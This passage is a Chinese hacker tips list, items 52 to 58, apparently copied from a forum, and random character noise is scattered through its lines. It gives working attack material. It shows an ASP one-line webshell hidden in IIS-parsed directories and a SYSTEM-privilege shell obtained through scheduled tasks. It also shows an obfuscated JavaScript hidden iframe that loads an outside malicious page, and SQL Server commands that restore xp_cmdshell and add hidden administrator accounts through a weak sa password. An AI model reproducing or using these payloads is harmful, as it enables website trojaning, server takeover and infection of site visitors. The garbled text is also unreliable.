7 \& ~! E& G. H z: T- X0 P5 I" k
52、at "12:17" /interactive cmd
3 }8 E1 \2 S& y1 c执行后可以用AT命令查看新加的任务
+ M& n9 O; U" w用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
/ d% y# n) v+ j7 L7 {8 h; M, {8 v6 c5 ]
53、隐藏ASP后门的两种方法2 H( I& C, T# }) _% {# |
1、建立非标准目录:mkdir images..\% d/ T9 n2 a5 f# K8 ?4 z& O
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp4 v. g, R6 e! i- n/ `) @4 ^* g
通过web访问ASP木马:http://ip/images../news.asp?action=login
. r# K- N& D: G+ c/ @5 A如何删除非标准目录:rmdir images..\ /s
8 d2 c* w* H# R7 ^% t' z& Y+ o2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:' L6 e1 z3 v, i [
mkdir programme.asp0 E2 ?1 i1 V; ]) Q
新建1.txt文件内容:<!--#include file=”12.jpg”-->2 Q: d- q- N& m1 D4 O
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
. L" c) ~; r7 |; J3 ?/ qattrib +H +S programme.asp2 A+ W- k; h9 D6 L1 J/ |
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt- t$ m8 k- N; M$ I) b
: s/ f5 e" E3 H$ o54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
8 P7 f% L, ]( H: j) s0 p8 S$ a然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。 ^7 z) P8 H% K
+ }+ z# F2 M/ F/ B# Q4 ?
55、JS隐蔽挂马6 B& w3 e1 Y" y- G: Z7 \5 U% y
1.
, _2 ]+ {3 j. P/ r- l/ J7 [var tr4c3="<iframe src=ht";. ]5 \8 K, R5 x: E- a) E" N$ L
tr4c3 = tr4c3+"tp:/";
9 m$ d7 T6 r {4 X5 itr4c3 = tr4c3+"/ww";
4 _" T6 g" l5 i3 etr4c3 = tr4c3+"w.tr4";& \: s4 u$ h) S' x1 {: f
tr4c3 = tr4c3+"c3.com/inc/m";
, P: x2 }% ~/ @3 R* F; l) O& D. ftr4c3 = tr4c3+"m.htm style="display:none"></i";' V0 a, H* s( N- q4 s
tr4c3 =tr4c3+"frame>'";( O' H- | Y/ D: k& K1 @8 H
document.write(tr4c3);5 J* R2 C2 g; t5 s
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。8 m% ^ J' X! E& @7 J; f* z
5 R- B( Y7 Y! e3 m2 r! a& `2.% D# a) Q9 I+ q! ~3 ^
转换进制,然后用EVAL执行。如) \" |$ k& f/ Z( W
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");; c2 R! p) F' |3 }7 i7 s# r
不过这个有点显眼。) z+ X3 b& }6 F8 ? `$ n
3.5 @+ D' @% r0 _ m
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>'); ?8 X- o- C! t( a( C1 a
最后一点,别忘了把文件的时间也修改下。 K# ~1 i0 N! B2 K/ W4 B
# K6 e2 z+ D4 ]9 y9 I; B56.3389终端入侵常用DOS命令
& e5 V: y7 F/ H" u9 j3 ltaskkill taskkill /PID 1248 /t; i+ D/ `. b0 [) v; U% l5 f
& D- |2 o3 Z0 h9 L
tasklist 查进程
2 `8 A/ }; n$ G4 H4 a2 E5 m) e% [- Z7 m2 C; l1 G! ^. {
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限0 e3 `7 l3 V" E8 G! p$ X/ O4 o
iisreset /reboot
+ u! ^7 q1 n% q! Q/ Btsshutdn /reboot /delay:1 重起服务器: F |) U! R! s0 O0 j( M
2 P$ o! W4 Z$ Q! T8 G4 t+ u& O
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
4 @7 L* s- X4 z. |! m/ V& W# S" v7 `& T) V
query user 查看当前终端用户在线情况
+ u+ d1 M# F \& T* O4 c' k; H" p, g- [3 M
要显示有关所有会话使用的进程的信息,请键入:query process *
2 q; |' }) A; O; \$ @9 T4 ?- {" u% `. Q. }
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2 R; P6 u. s# q0 y8 p
' ^9 U# m. [+ y% Z3 y
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2! K! g& k) v$ q4 Y- g
1 X0 ]% o- F% a7 {! Y% t. K: h要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
w8 W8 @/ s/ y p
& _% N# T& F+ k4 q' e. X+ F9 M命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启8 c$ k: d& h' W* x1 t. h8 R
- [3 c* U' {' R6 S命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
+ ?) C4 I1 }5 E' w
0 Z0 a" O* `, t- l9 D3 J' H命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。( _+ n9 `' g, ], T8 i; l
" s/ ^, |$ c; x4 n命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机, I( C" a5 M f7 w9 b* a
4 ~( B" N7 A: F% [0 m' F! J
56、在地址栏或按Ctrl+O,输入:
y) i6 @4 v# N9 }& J. Gjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;' ~. y. M$ |! p8 Z
9 N+ G& y. `/ q: h源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。4 s# @! }$ y( J$ f
4 M9 |# J$ c. Z$ ^
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,, w4 {2 y1 L$ J( `* u
用net localgroup administrators是可以看到管理组下,加了$的用户的。
3 Y2 n; @& f8 m1 W" |6 y2 B6 Z& `- G# B; n1 k
58、 sa弱口令相关命令/ A( l) |5 g/ Z8 Y/ Z! b
) f: B- s2 W+ S$ o
一.更改sa口令方法:8 k6 Y( v+ {# E' l ]* N
用sql综合利用工具连接后,执行命令:
2 z, L H* Z$ N+ r% |5 j) [$ o) nexec sp_password NULL,'20001001','sa'
) y+ l I# ]: _6 v5 h8 ^- X(提示:慎用!)$ q) ?7 V4 R7 c& w/ h6 |3 G) Y
6 t& v4 k+ f6 a1 D; _8 R. j
二.简单修补sa弱口令." s/ \5 {1 e# p6 E$ [" S: R; S
6 ?4 f) ` }; {6 R
方法1:查询分离器连接后执行:
! X/ y6 _% s$ b; |# C# i4 s$ t0 D% Nif exists (select * from, p' m; u: w" u
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
, k" H; t; n) r8 G& V7 mOBJECTPROPERTY(id, N'IsExtendedProc') = 1); g/ ^- p3 V! h
7 ]; X2 ?& y! a: R* n
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'" r0 R7 m+ H$ @, K' b C( J- J
* W* | y0 {" B$ f4 E5 ]. a) X- cGO
( R) t/ c# K7 S/ l6 X# k: R" N4 u# h E
然后按F5键命令执行完毕
2 v5 R6 l5 n' `1 d+ G) W$ O& e1 ^+ k7 R- C5 _; U/ z/ Y
方法2:查询分离器连接后' Q' N" Z& g7 H- O) Q; a
第一步执行:use master1 ?1 `4 [( e# a
第二步执行:sp_dropextendedproc 'xp_cmdshell'+ C+ J* P4 ~2 T0 t, i! y1 L
然后按F5键命令执行完毕- _' M D" V# X
# b3 R* D) d4 ?3 I
! t H) v3 x( A5 k三.常见情况恢复执行xp_cmdshell.
; q3 l8 r4 T2 X3 x( w% z
3 ~$ j) |$ Y0 ~1 Q- a# x, E e# I3 Q5 L- |5 f0 n
1 未能找到存储过程'master..xpcmdshell'.
" B. O7 i( X; Q: r+ j2 i 恢复方法:查询分离器连接后,
$ b. ~) q) \" @# L$ W9 J第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int1 i$ ], i$ O0 n, s. H4 `6 q3 H* p
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
( P9 N' \0 n H: v. a然后按F5键命令执行完毕
2 i1 J- P3 K4 s% u, `/ v, I& j; v: v' F- i* {% I
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。); x/ G3 \! a, d+ \( q
恢复方法:查询分离器连接后,
4 J! W: }( j+ Z, k1 W" b. ]第一步执行:sp_dropextendedproc "xp_cmdshell"
# p# E6 @5 Z4 T; {8 O. t第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
9 d) U# d& _7 T2 w3 h然后按F5键命令执行完毕( u1 |( u& M9 x& N1 z9 {0 f
2 Q$ X* o7 g& q- _1 R6 ?
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
8 b8 [) Z& P3 r% ^5 O- b恢复方法:查询分离器连接后,
/ i# P3 F( t N! I0 c! d第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
' m) ?' ?1 O. b9 M0 M3 V& ]: n第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
' J: \' \: S/ ?' A, B( V然后按F5键命令执行完毕
5 t. I {/ v/ o; J
: o5 g- r' ^. b; _四.终极方法.' d$ ~- P8 ~. p$ h% j
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:# r% k( u( {9 G' i9 @. g% F& ?7 Q
查询分离器连接后,
: y. i. N& o3 F4 ~; i2000servser系统:/ p8 ~) _2 \) j2 ~0 s) b- r2 l
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
" j. `8 u% }$ u! Q5 G8 G9 C8 M+ t7 {& T: r. Q1 U; r, K
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'/ S2 t m% B# `0 `
1 R: O$ k9 I' _3 ^6 U
xp或2003server系统:& B0 E/ A+ d3 S% w# U% Y1 f
3 V, E: V$ F* Edeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add': U8 z( P3 h% k% E. f
. O. ~$ u* ~" `2 A
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'5 O1 U1 ]' L2 h2 N+ G
|